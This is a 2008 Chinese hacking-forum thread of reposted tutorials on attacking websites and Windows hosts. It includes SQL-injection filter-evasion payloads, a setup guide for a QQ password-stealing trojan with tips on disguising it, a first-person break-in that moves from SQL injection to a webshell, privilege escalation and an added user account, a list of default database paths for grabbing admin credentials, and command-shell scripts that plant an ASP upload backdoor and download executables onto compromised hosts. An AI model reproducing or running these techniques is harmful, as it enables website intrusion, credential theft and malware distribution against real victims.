蓝色动力网络

 找回密码
 立即注册

扫一扫,访问微社区

QQ登录

只需一步,快速开始

入侵,外挂,后门,防御技术

[复制链接]
发表于 2008-11-1 14:17:32 | 显示全部楼层 |阅读模式
SQL Injection规避入侵检测技术(每日2篇-043)
当我们对一个运行IDS系统的服务器进行SQL注射时,我们往往会遇到很大的麻烦,因为我们的注射语句被过滤了,如何规避这种检测手段就成了一门新的技术,本文就对此规避技术提出十一条思路和方法,与大家商戳。

一、 运用编码技术绕过,如URLEncode编码,ASCII编码绕过。
如or 1=1即%6f%72%20%31%3d%31
Test即CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)

二、 通过空格绕过,如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如or’swords’=‘swords’,由于mssql的松散性,我们可以把or ‘swords’之间的空格去掉,并不影响运行。
三、 运用字符串判断代替经典的or 1=1判断绕过,如or ‘swords’=‘swords’

四、 通过类型转换修饰符N绕过,如or ‘swords’ = N’swords’,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。

五、 通过+号拆解字符串绕过,

如 or ‘swords’=‘sw’+’ords’
;EXEC(‘IN’+’SERT INTO ‘+’…..’)

六、 通过LIKE绕过,如or ‘swords’ LIKE ‘sw’

七、 通过IN绕过,如or ‘swords’ IN (‘swords’)

八、 通过BETWEEN绕过, 如or ‘swords’ BETWEEN ‘rw’ AND ‘tw’

九、 通过>或者<绕过,如

or ‘swords’>‘sw’
or ‘swords’<‘tw’
or 1<3

十、 运用注释语句绕过:

用/**/代替空格,如:
UNION /**/ SELECT /**/user,pwd,from tbluser

用/**/分割敏感词,如:

U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser

十一、 用HEX绕过,一般的IDS都无法检测出来。

0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)

以上的十一条SQL Injection规避入侵检测技术供您参考。
 楼主| 发表于 2008-11-1 14:17:55 | 显示全部楼层
主动出击教你夺回被人盗走的QQ号码(每日2篇-003)
很多朋友都有过QQ号被盗的经历,即使用“密码保护”功能找回来后,里面的Q币也已经被盗号者洗劫一空,碰到更恶毒的盗号者,还会将你的好友统统删除,朋友们将会永远得离开你。想过反击吗?什么,反击?别开玩笑了,我们只是菜鸟,不是黑客,我们只会看看网页,聊聊天,连QQ号是怎么被盗的都不知道,还能把盗号者怎么样呢?其实喜欢盗号的所谓“黑客”们,也只是利用了一些现成的盗号工具,只要我们了解了QQ号被盗的过程,就能作出相应防范,甚至由守转攻,给盗号者以致命一击。

一、知己知彼,盗号技术不再神秘

  如今,还在持续更新的QQ盗号软件已经所剩无几,其中最为著名,流传最广的则非“啊拉QQ大盗”莫属,目前绝大多数的QQ号被盗事件都是由这个软件引起的。软件的使用条件很简单,只要你有一个支持smtp发信的邮箱或者一个支持asp脚本的网页空间即可。而且该木马可以将盗取的QQ号自动分为靓号和非靓号两种,并将它们分别发送到不同的信箱中,这也是“啊拉QQ大盗”如此流行的原因之一。接下来,便让我们先来了解一下其工作原理,以便从中找到反击的良方。

  1、选择盗号模式

  下载“啊拉QQ大盗”,解压后有两个文件:alaqq.exe、爱永恒,爱保姆qq.asp。其中alaqq.exe是“啊拉QQ大盗”的配置程序,爱永恒,爱保姆qq.asp是使用“网站收信”模式时需使用的文件。正式使用之前,还需要设置其参数。

  “邮箱收信”配置:运行alaqq.exe,出现程序的配置界面。在“发信模式选择”选项中选中“邮箱收信”,在“邮箱收信”填写电子邮箱地址(建议使用程序默认的163.com网易的邮箱)。这里以邮箱n12345@163.com(密码n_12345)为例来介绍“邮箱收信”模式时的配置,并进行下文中的测试。此外,在“收信箱(靓)”和“收信箱(普)”中可以填入不同的邮箱地址用来接受QQ靓号和普通QQ号。然后在“发信服务器”下拉框中选择自己邮箱相应的smtp服务器,这里是smtp.163.com。最后填入发信箱的帐号、密码、全称即可。

  设置完毕后,我们可以来测试一下填写的内容是否正确,点击下方“测试邮箱”按钮,程序将会出现邮箱测试状态。如果测试的项目都显示成功,即可完成邮箱信息配置。

  “网站收信”配置:除了选择“邮箱收信”模式之外,我们还可以选择“网站收信”模式,让盗取的QQ号码自动上传到指定的网站空间。当然,在使用之前,也需要做一些准备工作。

  用FTP软件将爱永恒,爱保姆qq.asp上传支持ASP脚本的空间,运行alaqq.exe,在“Asp接口地址”中输入爱永恒,爱保姆qq.asp所在的URL地址,那么,当木马截获QQ号码信息后,就会将其保存于爱永恒,爱保姆qq.asp同目录下的qq.txt文件中。

  2、设置木马附加参数

  接下来我们进行高级设置。如果勾选“运行后关闭QQ”,对方一旦运行“啊拉QQ大盗”生成的木马,QQ将会在60秒后自动关闭,当对方再次登录QQ后,其QQ号码和密码会被木马所截获,并发送到盗号者的邮箱或网站空间中。此外,如果希望该木马被用于网吧环境,那就需要勾选“还原精灵自动转存”,以便系统重起后仍能运行木马。除这两项外,其他保持默认即可。

  3、盗取QQ号码信息

  配置完“啊拉QQ大盗”,点击程序界面中的“生成木马”,即可生成一个能盗取QQ号码的木马程序。我们可以将该程序伪装成图片、小游戏,或者和其他软件捆绑后进行传播。当有人运行相应的文件后,木马会隐藏到系统中,当系统中有QQ登录时,木马便会开始工作,将相关的号码及密码截取,并按照此前的设置,将这些信息发送到邮箱或者网站空间。

二、练就慧眼,让木马在系统中无处可逃

  现在,我们已经了解了“啊拉QQ大盗”的一般流程,那么如何才能从系统中发现“啊拉QQ大盗”呢?一般来说,如果碰到了以下几种情况,那就应该小心了。

  ·QQ自动关闭。

  ·运行某一程序后其自身消失不见。

  ·运行某一程序后杀毒软件自动关闭。

  ·访问杀毒软件网站时浏览器被自动关闭。

  ·如果杀毒软件有邮件监控功能的,出现程序发送邮件的警告框。

  ·安装有网络防火墙(例如天网防火墙),出现NTdhcp.exe访问网络的警告。

  出现上述情况的一种或多种,系统就有可能已经感染了“啊拉QQ大盗”。当然,感染了木马并不可怕,我们同样可以将其从系统中清除出去。

  1、手工查杀木马。发现系统感染了“啊拉QQ大盗”后我们可以手工将其清除。“啊拉QQ大盗”运行后会在系统目录中的system32文件夹下生成一个名为NTdhcp.exe的文件,并在注册表的启动项中加入木马的键值,以便每次系统启动都能运行木马。我们首先要做的就是运行“任务管理器”,结束其中的木马进程“NTdhcp.exe”。然后打开资源管理器中的“文件夹选项”,选择其中的“查看”标签,将其中“隐藏受保护的操作系统文件”选项前面的勾去掉。接着进入系统目录中的system32文件夹,将NTdhcp.exe文件删除。最后进入注册表删除NTdhcp.exe键值,该键值位于HKEY_LOCAL_MACHINE\\Software \\Microsoft \\Windows \\Currentversion \\Run。

  2、卸载木马。卸载“啊拉QQ大盗”很简单,只要下载“啊拉QQ大盗”的配置程序,运行后点击其中的“卸载程序”按钮即可将木马完全清除出系统。

三、以退为进,给盗号者以致命一击

  忙乎了半天,终于把系统中的“啊拉QQ大盗”彻底清除,那么,面对可恶的盗号者,我们是不是应该给他一个教训呢?

  1、利用漏洞,由守转攻

  这里所谓的“攻”,并不是直接入侵盗号者的电脑,相信这种“技术活”并不适合大家。这里只是从盗号软件几乎都存在的漏洞入手,从而给盗号者一个教训。

  那么这个漏洞是什么呢?

  从此前对“啊拉QQ大盗”的分析中可以看到,配置部分填写了收取QQ号码信息邮件的邮箱帐号和密码,而邮箱的帐号和密码都是明文保存在木马程序中的。因此,我们可以从生成的木马程序中找到盗号者的邮箱帐号和密码。进而轻松控制盗号者的邮箱,让盗号者偷鸡不成反蚀把米。

  提示:以上漏洞仅存在于将QQ号码信息以邮件发送方式的木马,如果在配置“啊拉QQ大盗”的过程中选择使用网站接收的方式则不存在该漏洞。

  2、网络嗅探,反夺盗号者邮箱

  当木马截取到QQ号码和密码后,会将这些信息以电子邮件的形式发送到盗号者的邮箱,我们可以从这里入手,在木马发送邮件的过程中将网络数据包截取下来,这个被截获的数据包中就含有盗号者邮箱的帐号和密码。截取数据包时我们可以使用一些网络嗅探软件,这些嗅探软件可以很轻松得截取数据包并自动过滤出密码信息。

  ·x-sniff

  x-sniff是一款命令行下的嗅探工具,嗅探能力十分强大,尤其适合嗅探数据包中的密码信息。

  将下载下来的x-sniff解压到某个目录中,例如“c:\\”,然后运行“命令提示符”,在“命令提示符”中进入x-sniff所在的目录,然后输入命令“xsiff.exe -pass -hide -log pass.log”即可(命令含义:在后台运行x-sniff,从数据包中过滤出密码信息,并将嗅探到的密码信息保存到同目录下的pass.log文件中)。

  嗅探软件设置完毕,我们就可以正常登录QQ。此时,木马也开始运行起来,但由于我们已经运行x-sniff,木马发出的信息都将被截取。稍等片刻后,进入x-sniff所在的文件夹,打开pass.log,便可以发现x-sniff已经成功嗅探到邮箱的帐户和密码。

  ·sinffer

  可能很多朋友对命令行下的东西都有一种恐惧感,所以我们可以使用图形化的嗅探工具来进行嗅探。例如适合新手使用的sinffer。

  运行sinffer之前,我们需要安装WinPcap驱动,否则sinffer将不能正常运行。

  运行sinffer。首先我们需要为sinffer.exe指定一块网卡,点击工具栏上的网卡图标,在弹出的窗口中选择自己使用的网卡,点“OK”后即可完成配置。确定以上配置后,点击sinffer工具栏中的“开始”按钮,软件即开始了嗅探工作。

  接下来,我们正常登陆QQ,如果嗅探成功,就会在sinffer的界面中出现捕获的数据包,其中邮箱帐号密码信息被很清晰得罗列了出来。

  得到盗号者的邮箱帐号和密码以后,我们可以将其中的QQ号码信息邮件全部删除,或者修改他的邮箱密码,给盗号者一个教训,让我们菜鸟也正义一把。


                      禁止用以上任何一种方法来做坏事
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-11-1 14:18:30 | 显示全部楼层
如何入侵目标主机(每日2篇-005)
1.找下载站点www.abcd.com(假设)

2.帮他检测下网站的安全
http://www.abcd.com/download/671.html

这个是他的下载页面  html的哦

是这样哦。。。一般的小鸟就走了对吧。。我们因该跟详细的看下。。

有个下载地址 或者看他的原代码。搜索asp?  就回出来了。。。

我今天是看他的原文件。。找到/view.asp?id=671  在连接上 上面的那句

整个地址是

http://www.okgogogo.com/download/view.asp?id=671

好了 我们在后面加个\' 号看看先。。。

Microsoft JET Database Engine 错误 \'80040e14\'

字符串的语法错误 在查询表达式 \'ID=671\'\' 中。

/download/view.asp,行 49

哈 在继续。。通过 and 1=1 跟 and 1=2 确定这个地址存在在sql注入漏洞

(什么是SQL注入漏洞?) 去google搜索注入天书。。多看几便就明白了。

放到domain里面跑了。。出来个 dv-admin 这个表 估计是论坛的。

跑出来的密码确是MD5加密的。。。汗。。没法了。。先试试旁注吧。。

在其他的站上找到个/diy.asp  哈哈 被人搞过了哦。。那就省了我麻烦。

直接用别人的shell了自己在写个大马就成了。。。得到WEBSHELL后 发现权限是

死死的。。。看看服务器的信息。。

对象不支持此属性或方法
对象不支持此属性或方法


error: 文件无法被打开。
error: ADODB.Stream

郁闷。。利用 执行CMD 命令 返回的也一样。。估计是CMD。EXE这个被删除

了。现在提升权限的基本思路就是。。

1。看看数据库的连接文件。一般就是conn.asp 了。

2。找到可以写的目录 把cmdl.exe写进去。。。

3。找到可以提升权限的程序。。一般就是serv-u 了。

4。利用替换系统的服务

5。益出。。

6。PCANYWHERE

主机的情况。 c  d e  f 盘全都不能访问 跳转c:/Program Files 失败

跳转c:\\Documents and Settings  成功 在all user\\桌面

找到serv-u的快捷方式。。下载到本地 然后查看属性。。OK 知道了 原来是

D:\\Program Files\\serv-u \\ 哈哈。。现在知道了。。那就利用WEBSHELL跳转过

去了。。跳转成功。。试着修改他的配置文件。。防回 没有权限。哎。早知回如

此,在看下他的说明文件 看看是什么版本的。。哈哈 是4.1 汗。。

到下载都还用这么低? 狂晕。。。

好了。。。权限提升的程序找到了。。现在找可写的目录。

一般就是c:\\winnt\\temp
            c:\\winnt\\system32\\inetsrv\\data  可写

马上传了个CMD。EXE 上去。。在WScript.Shell程序运行器 运行刚才的路径

c:\\winnt\\system32\\inetsrv\\data\\cmd.exe  在下面运行

ipconfig /all

OK  成功返回。。看来是行了。。

运行 net user  

返回空白???刚开始我也郁闷了 试了NNN久了。。都不行。。后来想到

net.exe这个程序可能被删了。。那么我们就运行net1.exe 一样的哈

运行net1.exe user 跟 net1.exe start

都成功返回了。。哈哈。。(由于篇幅的原因我就不把结果发上来了。大家因该

能想的到吧。)知道 主机的信息了。。装了瑞星 开了3389 不过终端已经被改了

还开了radmin  哈哈 这下他是死定了。。我们serv-u都还没用呢。。

传了个ftp.exe 上去 执行命令

D:\\web\\abc.com\\ftp.exe “net1.exe user haha hacker /add\"

意思是加了个用户 我想也不用多解释了,大家因该都能懂的,

OK 成功返回  不过不太一样。。感觉怪怪的。后来试了查一下

net1.exe user haha

返回空白。。。郁闷。。。看来是没有添加成功。。命令是对的,,难道程序问

题? 后来换了个serv-u 6.0的溢出程序 返回的还是一样。。没成功。。

无语,,,这步就难住了。。后来用dir 查看了 C D E 哈 都可以

柳暗花明又一村啊。。。。在WEBSHELL里执行

dir d:\\web\\  返回了 NN多的站点。。哇哈哈。。。狂喜。。。

后来找到自己的目标站点后。。利用跳转。。。

返回。。目录不存在或者不允许反问。。。晕。。服了你。

但是能dir查看 那就继续的查吧。。dir d:\\web\\abc.com\\admin\\image\\

试试这个能不能跳 (因为我以前试过哈。有时候成功过,碰运气了。)

在WEBSHELL里 输入。D:\\web\\abc.com\\admin\\image  哈哈 出现了。。很多

的图片,,娃卡卡。。。明天去买彩票  哈哈。。马上自己传了个SHELL上去

在访问。。。嘻嘻。。成功。。。目标站点就这样的被偶搞定了 哈哈。。

到了这里我也就没继续弄下去了。。。不过radmin 因该可以利用 从注册表里导

出他的文件。哈哈。。替换呢 就是替换了他的瑞星启动程序。。

如果谁在这篇菜文中得到了帮助。我想它因该完成了它的使命了。

思路是靠平时慢慢的这里 积累起来的。。。并不是一步登天。脚塌实地的来
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-11-1 14:18:51 | 显示全部楼层
10秒钟得到所有网站系统的管理员用户名和密码(每日2篇-006)
漏洞级别35%
首先分析你的目标网站是什么数据库

然后对应接入以下地址,比如你的网站是http://www.xxx.com  分析得到此为动网数据库


http://www.xxx.com/data/dvbbs7.mdb    看明白意思了么?

打开后,会弹出一个保存窗口,你点击下载,保存到桌面上,


很小的文件,是对方默认的数据库,    下载完毕后  用系统办公软件Excel打开,或者用辅臣数据库浏览器打开,
打开里面的Admin  密码在后面  一般都是MD5的

接下来  www.md5.com  在线转换md5  破出密码..................................

一切ok了

/data/dvbbs7.mdb 动网论坛数据库
/databackup/dvbbs7.mdb 动网论坛数据库
/bbs/databackup/dvbbs7.mdb 动网论坛数据库
/admin/data/qcdn_news.mdb 青创文章管理系统数据库
/data/qcdn_news.mdb 青创文章管理系统数据库
/firend.mdb 交友中心数据库
/database/NewCloud6.mdb 新云管理系统6.0数据库
/database/PowerEasy4.mdb 动易网站管理系统4.03数据库
/blogdata/L-BLOG.mdb L-BLOG v1.08数据库
/database/bbsxp.mdb BBSXP论坛数据库
/access/sf2.mdb 雪人论坛程序v2.0数据库
/data/Leadbbs.mdb LeadBBS论坛 v3.14数据库
/bbs/Data/LeadBBS.mdb LeadBBS论坛 v3.14数据库
/bbs/access/sf2.mdb 雪人论坛程序v2.0数据库
/bbs/database/bbsxp.mdb BBSXP论坛数据库
/blog/blogdata/L-BLOG.mdb L-BLOG v1.08数据库
/fdnews.asp 六合专用BBS数据库
/bbs/fdnews.asp 六合专用BBS数据库
/admin/ydxzdate.asa 雨点下载系统 v2.0+SP1数据库
/data/down.mdb 动感下载系统XP Ver2.0数据库
/database/Database.mdb 轩溪下载系统 v3.1数据库
/db/xzjddown.mdb lhdownXp 下载系统数据库
/data/db1.mdb 动感下载系统XP v1.3数据库
/db/play.asp 娱乐先锋论坛 v3.0数据库
/mdb.asp 惊云下载系统 v1.2数据库
/admin/data/user.asp 惊云下载系统 V3.0数据库
/data_jk/joekoe_data.asp 乔客6.0数据库
/data/news3000.asp 沸腾展望新闻系统 v1.1数据库
/data/appoen.mdb 惠信新闻系统4.0数据库
/data/12912.asp 飞龙文章管理系统 v2.1数据库
/database.asp 动感极品下载管理系统 v3.5
/download.mdb 华仔软件下载管理系统 v2.3
/data/zm_marry.asp 动网SP2美化版数据库
/dxxobbs/mdb/dxxobbs.mdb dxxobbs论坛数据库
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-11-1 14:20:04 | 显示全部楼层
CMD模式下的入侵技术大全(每日2篇-007)
前言
Cmd Shell(命令行交互)是黑客永恒的话题.它历史悠久并且长盛不衰.
本文旨在介绍和总结一些在命令行下控制Windows系统的方法.这些方法都是尽可能地利用系统自带的工具实现的.


文件传输
对于溢出漏洞获得的cmdshell.最大的问题就是如何上传文件.由于蠕虫病毒流行.连接ipc$所需要的139或445端口被路由封锁.再加上WinXP系统加强了对ipc$的保护.通过ipc$及默认共享上传文件的手段基本无效了.ftp和tftp是两种可行的方法.介于其已被大家熟知.本文就不介绍了.还有三种大家熟悉的办法.作为总结我再提一下:

1.用Echo命令写ASP木马.
前提当然是目标主机上已经安装了IIS.
一般的ASP木马\"体积\"较大.不适合直接用echo命令写入文件.这里我提供一个小巧的.
直接给出echo版:

@echo^<%with server.createobject(\"adodb.stream\"):.type=1:.open:.writerequest.binaryread(request.totalbytes):.savetofileserver.mappath(request.querystring(\"s\")),2:end with%^> >up.asp

注意.只有一行.中间没有回车符.
生成的up.asp不能用浏览器访问.只能用下面这个脚本:

with wscript
if .arguments.count<3 then .quit
url=.arguments(0)&;amp;\"?s=\"&;amp;.arguments(2)
fn=.arguments(1)
end with
with createobject(\"adodb.stream\")
.type=1:.open:.loadfromfile fn:s=.read:.close
end with
with createobject(\"microsoft.xmlhttp\")
.open \"post\",url,false:.send s
wscript.echo .statustext
end with

将其保存为up.vbs.假设目标IP为123.45.67.89.up.asp在IIS虚拟根目录下.需要上传的文件为nc.exe.上传后保存为mm.exe.相应的命令是:

cscript up.vbs http://123.45.67.89/up.asp  nc.exe mm.exe

注意.这个命令是在本地命令行中执行的.不要弄错了.另外.通过IIS上传会留日志.要记得清除哦.

2.自动下载到网页缓存中.
例如:start its:http://www.sometips.com/soft/ps.exe

在远程shell中执行上面这个命令后.ps.exe已经下载到目标主机的网页缓存目录中了.然后:

cd \"C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\"
dir /s ps[1].exe

于是获得ps.exe的具体位置(每台主机都不一样).如:

C:\\Documents and Settings\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\AB094JIT 的目录

2004-01-24 14:24 49,152 ps[1].exe
1 个文件 49,152 字节

最后:
copy AB094JIT\\ps[1].exe c:\\path\\ps.exe
del AB094JIT\\ps[1].exe

补充说明:
对于以服务为启动方式的后门所提供的shell.其用户身份一般是System.此时网页缓存目录的位置就如例子中所示.如果shell的身份不是System.需要修改Default User为相应的用户名.
本方法会启动一个IE进程.记得要将它杀掉.如果是System身份的shell.不会在本地出现窗口而暴露.
另外.用ms-its代替its效果完全一样.

3.Echo一个脚本下载web资源.
现成的工具是iGet.vbs.我再给出一个含必要容错功能的版本.
仍然是echo版:

@echo with wscript:if .arguments.count^<2 then .quit:end if > dl.vbs
@echo set aso=.createobject(\"adodb.stream\"):set web=createobject(\"microsoft.xmlhttp\") >> dl.vbs
@echo web.open \"get\",.arguments(0),0:web.send:if web.status^>200 then .echo \"Error:\" web.status:.quit >> dl.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> dl.vbs

举例--下载ps.exe并保存到c:\\path下:

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\\path\\ps.exe

注意.这是在远程shell中执行的.

4.Echo经过编码的任何文件.再用脚本 debug还原.
前面两个办法都不能保证穿过防火墙.而且.除非自己架Web服务器.一般的Web资源都是以压缩文件的形式提供.如果目标主机没有解压工具.还是没辙.那么只有出\"杀手锏\"了

echo命令加重定向操作符可以写入ASCII码小于128的字符.但大于等于128的不行.只有将本地文件重新\"编码\"为可显示的字符.才能方便地写入远程主机.首先能想到的就是base64编码.即email附件的编码方式.但vbs不支持位操作.因此编码和解码较复杂.更麻烦的是.脚本以黑吧流方式处理文件的能力很差.(ADODB.Stream可以以流方式写文件.但我无法构造出相应的数据类型.黑吧数据流可以用midb函数转成字符串.但反过来不行.我花了两天时间.还是没能解决这个问题.如果有谁能用vbs或js写任意的字节数据到文件中.恳请赐教.)

无奈只有请debug.exe出马了.原理很多人都知道.我不介绍了.直接给出成果--编码脚本:

fp=wscript.arguments(0)
fn=right(fp,len(fp)-instrrev(fp,\"\\\"))
with createobject(\"adodb.stream\")
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl\\65536
with createobject(\"scripting.filesystemobject\").opentextfile(fp&;amp;\".bat\",2,true)
.write \"@echo str=\"\"\"
for i=1 to sl
bt=ascb(midb(str,i,1))
if bt<16 then .write \"0\"
.write hex(bt)
if i mod 128=0 then .write \"\"\"_>>debug.vbs\" vbcrlf \"@echo \"\"\"
next
.writeline \"\"\">>debug.vbs\" vbcrlf \"@echo with wscript.stdout:r=vbcrlf\"_
\":for i=1 to len(str) step 48:.write \"\"e\"\" hex(256 (i-1)/2)\"_
\":for j=i to i 46 step 2:.write \"\" \"\" mid(str,j,2):next:.write r:next>>debug.vbs\"
.writeline \"@echo .write \"\"rbx\"\" r \"\"\" hex(slh) \"\"\" r \"\"rcx\"\" r \"\"\" hex(sll)_
\"\"\" r \"\"n debug.tmp\"\" r \"\"w\"\" r \"\"q\"\" r:end with\"_
\">>debug.vbs&;amp;&;amp;cscript//nologo debug.vbs|debug.exe>nul&;amp;&;amp;ren debug.tmp\"\"\"&;amp;fn&;amp;\"\"\"&;amp;del debug.vbs\"
end with

将其保存为echo.vbs.假设要上传nc.exe.那么在本地命令行输入命令:

cscript echo.vbs nc.exe

也可以直接把要传输的文件的图标拖放到脚本文件的图标上.
稍等一会儿.在当前目录下将生成一个nc.exe.bat.用记事本等编辑工具打开它.可以看到如下内容:

@echostr=\"4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000\"_>>debug.vbs
@echo\"504500004C010400B98EAE340000000000000000E0000F010B010500009800000062000000000000004C00000010000000B0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000\"_>>debug.vbs
@echo\"002001003C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0210100640100000000000000000000000000000000000000000000000000002E74657874000000\"_>>debug.vbs
@echo\"70970000001000000098000000040000000000000000000000000000200000602E726461746100001704000000B0000000060000009C0000000000000000000000000000400000402E646174610000004452000000C00000003E000000A20000000000000000000000000000400000C02E696461746100005C07000000200100\"_>>debug.vbs
............
............(省略若干行)
............
@echo \"\">>debug.vbs
@echowith wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write \"e\"hex(256 (i-1)/2):for j=i to i 46 step 2:.write \" \"mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write \"rbx\"r \"0\" r \"rcx\" r \"E800\" r \"n debug.tmp\" r \"w\" r \"q\" r:endwith>>debug.vbs&;amp;&;amp;cscript //nologodebug.vbs|debug.exe>nul&;amp;&;amp;ren debug.tmp\"NC.EXE\"&;amp;del debug.vbs

全选 -》 复制 -》 切换到远程命令行窗口 -》 粘贴.
如果网速不是很慢的话.整个上传过程大约需要20秒.

几点说明:
1.大的文件传输不稳定.可能会使shell死掉.所以文件越小效果越好.建议原文件不要超过100KB.
2.在传输大文件前.可以先传个小的文件作为\"热身\".让16位虚拟机ntvdm.exe驻留后台.所有文件传完后.为隐蔽起见.应该把ntvdm进程杀掉.
3.某些cmd shell每个命令都需要附加两个回车.那nc.exe.bat就不能直接用了.
4.单个命令的长度是有限的.所以不能只用一个echo完成全部任务.而且.对于nc提供的cmdshell.稍长一些的命令竟然会使shell自动退出(溢出了?).你可以修改\"i mod128=0\"语句中的128以调整每个echo命令的长度.每次echo的字符为这个数乘以2.
5.解码过程没有脚本参与也是可以的.使用脚本的目的是减少传输的数据量(因为压缩了数据).如果有时间.我会写一个更完善的脚本.加强数据压缩能力.增加数据校验功能.

能上传文件当然一切都好办了.但很多操作用Windows自带的工具更方便.在你到处寻找需要的工具时.不要忘了Windows本身
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-11-1 14:20:20 | 显示全部楼层
突破单位网管封QQ,MSN端口方法(每日2篇-008)
不少公司的防火墙作了较为严格的限制,以至于很多网络服务如QQ、MSN都无法运行,如果你还能够打开网页,那么,使用Http通道软件可以让你突破限制,可以在现有的网络条件中使用任何网络服务。

  使用Http通道软件可以突破防火墙的限制,利用唯一Http访问的权限获得其他Internet应用。那么什么是通道呢?这里所谓的通道,是指一种绕过防火墙端口屏蔽的通讯方式。防火墙两端的数据包封装在防火墙所允许通过的数据包类型或是端口上,然后穿过防火墙与对方通讯,当封装的数据包到达目的地时,再将数据包还原,并将还原后的数据包转交到相应的服务器上。

 http://www.http-tunnel.com/ 是一个专业提供Http通道服务的公司,通过他们的在线Tunnel Server,局域网内的用户可以使用被防火墙所屏蔽的ICQ、E-mail、PC Anywhere、MSN、 QQ、Napster等软件。

  使用Http-tunnel的Tunnel Server必须使用Http-tunnel的客户端程序Http-Tunnel Client,Http-Tunnel Client的免费版本允许40Kb/秒的数据转发服务。

  一、程序安装和设置

  1.运行下载的安装程序,安装过程比较简单一路Next即可完成。

  2.安装完成后,会弹出\"Configuration(配置)\"窗口,设置本机的Internet连接,有三个选项:

  a) Auto detected(自动检测):你果你不知道你的机器连接,可以选择这个。

  b) No Proxy,only a firewall(直接上网,有防火墙):使用局域网和直接上网的用户选这个。

  c) Specify Proxy(指定代理服务器):如果你使用代理服务器上网,选这个,同时你还必须输入代理服务器的地址和端口,如果需要用户名和密码还需要一并输入。

  3.设置好连接,可以单击\"Test(测试)\"按钮,测试一下,如果看到\"Test successful(测试成功)\"的提示,就代表你设置的已经完成。

  4.程序正常运行后,可以将它最小化,它会在任务栏的提示区内生成一个下图标,单击可还原。

二、设置QQ访问

  由于QQ对外访问使用的端口是4000,所以网络管理员通常通过限制端口的使用来限制QQ的访问,下面介绍一下如何设置QQ通过http-tunnel访问Internet。

  1.打开QQ,单击\"QQ菜单\"按钮,选择\"系统参数\"。

  2.在弹出的QQ参数设置窗口中,选择\"网络设置\"。

  3.勾上\"使用代理服务器\"。

  4.输入代理服务器地址:127.0.0.1,端口号:1080。

  5.确定,关闭所有窗口,重新登录即可使用QQ了。

  三、设置MSN访问

  MSN的访问设置可QQ差不多,不过http-tunnel支持MSN要比QQ好得多,设置步骤如下:

  1.选择\"工具\"菜单的\"选项\"。

  2.选择\"连接\"标签。

  3.勾上\"我使用代理服务器\"。

  4.类型选择\"SOCKS4\",服务器中输入\"127.0.0.1\",端口号\"1080\"。

  5.确定,关闭所有窗口,重新登录即可使用MSN了。

四、设置Cuteftp的访问

  有时候网络管理员为控制网络带宽的使用和保障信息安全,需要限制FTP服务,这给文件的上传和下载带来了不便。通过设置一样可以确保Cuteftp实现Internet的访问,设置步骤如下:

  1.选择\"编辑\"菜单,选择\"设置\",弹出设置窗口。

  2.展开\"连接\",选择\"SOCKS\",选择\"SOCKs4\",主机:127.0.0.1 端口:1080。(tu5.bmp)

  3.选择\"防火墙\",勾上\"启用防火墙访问\"和\"ASV模式\"

  4.确定,关闭所有窗口,即可选择站点登录下载文件。

  五、设置Windows XP的远程桌面连接使用Http-Tunnel

  由于远程桌面连接并没有提供代理服务器设置的界面,所以无法像QQ、MSN和Cuteftp一样直接设置,这时候我们可以使用SocksCap协助我们完成,具体步骤是:

  1.安装SocksCap。

  2.运行SocksCap,选择\"文件\"菜单中的\"设置\",弹出\"SocksCap 设置\"对话框。

  3.在\"服务器/SOCKS 服务器\"并填上127.0.0.1,\"Port(端口)\"填1080。

  4.在\"Protocol\"里选择\"SOCKS 版本 4\",在\"域名解析\"里选择\"Resolve all names remote(远程解析)\"。

  5.单击\"新建\"按钮,在\"标识项名称\"中输入mstsc。

  6.单击\"浏览\"按钮,找到MStsc.exe文件所在的位置即可。

  7.单击\"确定\"按钮即可。

  使用时,双击SocksCap列表中的mstsc图标,即可启动mstsc,mstsc访问网络都将通过代理跳板进行。需注意的是,一定要从SocksCap中启动mstsc,否则将不会使用代理跳板。其实很多不能设置的防火墙的Internet应用程序,都可以通过这种方式,实现Http通道的功能
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-11-1 14:20:49 | 显示全部楼层
黑客技巧之入侵Win XP常用7大招数(每日2篇-009)
本文讲述了黑客入侵Windows XP操作系统常用的七种方法,如果大家遇到类似那可要注意了……
  第一招:屏幕保护
  在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。
  提示:部分设计不完善的屏幕保护程序没有屏蔽系统的“Ctrl+Alt+Del”的组合键,因此需要设置完成之后测试一下程序是否存在这个重大Bug。
  不过,屏幕保护最快只能在用户离开1分钟之后自动启动,难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗?其实我们只要打开Windows安装目录里面的system子目录,然后找到相应的屏幕保护程序(扩展名是SCR),按住鼠标右键将它们拖曳到桌面上,选择弹出菜单中的“在当前位置创建快捷方式”命令,在桌面上为这些屏幕保护程序建立一个快捷方式。
